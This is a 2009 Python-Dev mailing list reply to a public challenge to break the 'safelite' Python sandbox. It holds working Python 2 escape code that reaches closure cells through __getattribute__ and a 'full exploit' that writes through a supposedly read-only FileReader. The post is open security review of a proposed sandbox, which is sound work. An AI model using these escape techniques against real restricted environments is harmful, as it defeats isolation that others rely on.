[Python-Dev] Challenge: Please break this! [Now with blog post]
Victor Stinner
victor.stinner at haypocalc.com
Tue Feb 24 01:31:55 CET 2009
Le Monday 23 February 2009 23:41:30, vous avez écrit :
> http://tav.espians.com/a-challenge-to-break-python-security.html
>
> Please blog/retweet and of course, try the challenge yourselves =)
The challenge can be seen as: is it possible to read "secret" in the following
code without using b.func_code, b.func_globals or b.func_closure:
---------------------
def a():
secret = 42
def b():
print(secret)
return b
b = a()
secret = ???
---------------------
With func_xxx, it's possible to get the secret with:
---------------------
def get_cell_value(cell):
return type(lambda: 0)((lambda x: lambda: x)(0).func_code, {}, None, None,
(cell,))()
secret = get_cell_value(b.func_closure[0]) # 42
---------------------
Function found at: http://code.activestate.com/recipes/439096/
But how can we get the closure if b.func_closure doesn't exist? Oh, wait!
What's this: b.__getattribute__...
-------------------------------------
secret = get_cell_value(b.__getattribute__('func_closure')[0])
-------------------------------------
About FileReader, a full exploit:
-------------------------------------
from safelite import FileReader
def get_cell_value(cell):
return type(lambda: 0)((lambda x: lambda: x)(0).func_code, {}, None, None,
(cell,))()
# Create 'w' string which is equals to 'r'
class Mode(str):
def __str__(self):
return self
def __eq__(self, x):
return x == 'r'
mode = Mode('w')
f = FileReader('0wn3d', 'w')
fileobj = get_cell_value(f.tell.__getattribute__('func_closure')[0])
fileobj.write('twice!\n')
f.close()
-------------------------------------
--
Victor Stinner aka haypo
http://www.haypocalc.com/blog/
More information about the Python-Dev
mailing list